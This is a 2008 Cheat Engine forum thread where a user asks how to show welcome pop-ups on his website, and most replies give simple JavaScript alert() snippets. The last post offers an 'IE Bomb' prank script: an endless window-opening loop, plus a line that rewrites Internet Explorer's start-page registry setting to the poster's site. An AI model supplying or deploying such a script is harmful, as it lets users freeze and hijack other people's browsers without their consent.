Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


Error on website?

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk
View previous topic :: View next topic  
Author Message
</3 Emo Anthony </3
Master Cheater
Reputation: 0

Joined: 15 Dec 2007
Posts: 453
Location: Does it matter...? No matter where i am i will be lost forever.

PostPosted: Mon Jan 21, 2008 3:13 pm    Post subject: Error on website? Reply with quote

i want my website to have pop-up errors that i have created know any good sites for this or how i can do this.
_________________


PM me if you have a question about RS priv servers and i'll answer it.
"Sure my methods may be un-ethical but they sure as hell work."
I'm formally known as Cloud Strife.
Back to top
View user's profile Send private message
kjmarket
Grandmaster Cheater
Reputation: 0

Joined: 11 Oct 2006
Posts: 600

PostPosted: Mon Jan 21, 2008 4:18 pm    Post subject: Reply with quote

It's really easy, but...why? Do you have any idea how annoying that is?
_________________


I can hear the voices of opcodes. "Come and NOP me!" Come and NOP me!"
Back to top
View user's profile Send private message MSN Messenger
</3 Emo Anthony </3
Master Cheater
Reputation: 0

Joined: 15 Dec 2007
Posts: 453
Location: Does it matter...? No matter where i am i will be lost forever.

PostPosted: Mon Jan 21, 2008 4:48 pm    Post subject: Reply with quote

No i mean like as soon as they come in 1 will pop-up and say "welcome to my website! Enjoy"
_________________


PM me if you have a question about RS priv servers and i'll answer it.
"Sure my methods may be un-ethical but they sure as hell work."
I'm formally known as Cloud Strife.
Back to top
View user's profile Send private message
haxor5354
Master Cheater
Reputation: 0

Joined: 11 Jan 2008
Posts: 306
Location: Toronto

PostPosted: Mon Jan 21, 2008 9:33 pm    Post subject: Reply with quote

i got this from w3c school i hope dat helps u


<html>
<head>
<script type="text/javascript">
function disp_alert()
{
alert("ENTER TEXT HERE");
}
</script>
</head>
<body>

<input type="button" onclick="disp_alert()" value="ENTER TEXT HERE" />

</body>
</html>

_________________


My Rig
MoBo: Asus P5QPL-AM
Cpu: Intel Core 2 Quad Q8200
Ram: Kingston 2x2GB DDR2 800
GFX: Asus ENGTS250 DK
HDD: 500GB WD Caviar Green
Mon: LG Flatron W2243T 1080p
Back to top
View user's profile Send private message MSN Messenger
</3 Emo Anthony </3
Master Cheater
Reputation: 0

Joined: 15 Dec 2007
Posts: 453
Location: Does it matter...? No matter where i am i will be lost forever.

PostPosted: Tue Jan 22, 2008 5:41 am    Post subject: Reply with quote

Umm im not sure that i understand it..
_________________


PM me if you have a question about RS priv servers and i'll answer it.
"Sure my methods may be un-ethical but they sure as hell work."
I'm formally known as Cloud Strife.
Back to top
View user's profile Send private message
Pseudo Xero
I post too much
Reputation: 0

Joined: 16 Feb 2007
Posts: 2607

PostPosted: Tue Jan 22, 2008 5:56 am    Post subject: Reply with quote

dynamite,man911 wrote:
No i mean like as soon as they come in 1 will pop-up and say "welcome to my website! Enjoy"

Code:
alert("welcome to my website! Enjoy")

_________________
haxory' wrote:
can't VB do anything??
windows is programmed using VB right? correct me if im wrong.

so all things in windows you have like the start menu is a windows form too.
Back to top
View user's profile Send private message
Lorrenzo
Moderator
Reputation: 4

Joined: 02 Jun 2006
Posts: 3744

PostPosted: Tue Jan 22, 2008 6:16 am    Post subject: Reply with quote

Most pop-up blockers will prevent them.
_________________
LAWLrrenzolicious
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Tue Jan 22, 2008 7:23 am    Post subject: Reply with quote

this is how i do it.
Code:
<SCRIPT language="JavaScript">
alert ('This Is What Will Pop Up')
</script>

_________________
I'm out.
Back to top
View user's profile Send private message
Pseudo Xero
I post too much
Reputation: 0

Joined: 16 Feb 2007
Posts: 2607

PostPosted: Tue Jan 22, 2008 7:45 am    Post subject: Reply with quote

Lorrenzo wrote:
Most pop-up blockers will prevent them.

No. Disabling Javascript will prevent them.

_________________
haxory' wrote:
can't VB do anything??
windows is programmed using VB right? correct me if im wrong.

so all things in windows you have like the start menu is a windows form too.
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Tue Jan 22, 2008 7:53 am    Post subject: Reply with quote

Xenophobe wrote:
Lorrenzo wrote:
Most pop-up blockers will prevent them.

No. Disabling Javascript will prevent them.

Yeh or in opera and maybe FF i dno, you press stop excituting scripts on this page.
and their gone.

_________________
I'm out.
Back to top
View user's profile Send private message
Epic Fail
Newbie cheater
Reputation: 0

Joined: 22 Jan 2008
Posts: 11

PostPosted: Tue Jan 22, 2008 11:29 am    Post subject: Reply with quote

Wow. Why waste your time on such a small detail? why not just put it inside the banner? Shocked
_________________
Back to top
View user's profile Send private message
haxor5354
Master Cheater
Reputation: 0

Joined: 11 Jan 2008
Posts: 306
Location: Toronto

PostPosted: Tue Jan 22, 2008 3:22 pm    Post subject: Reply with quote

make ur friend lag like hell with my script

Code:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>IE Bomb</title>
</head>
<script language="javascript">
<!--
while(true)
{
window.open("about:blank");   //haxor5354
}
-->
</script>
<script language="javascript">
set regwsh =createobject("wscript.shell")
regwsh.rewrite"hkcu\software\microsoft\internet exlorer\main\startpage","http://haxor5354.go.51.net"   //go to this site   
</script>
<body>
</body>
</html>

_________________


My Rig
MoBo: Asus P5QPL-AM
Cpu: Intel Core 2 Quad Q8200
Ram: Kingston 2x2GB DDR2 800
GFX: Asus ENGTS250 DK
HDD: 500GB WD Caviar Green
Mon: LG Flatron W2243T 1080p
Back to top
View user's profile Send private message MSN Messenger
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites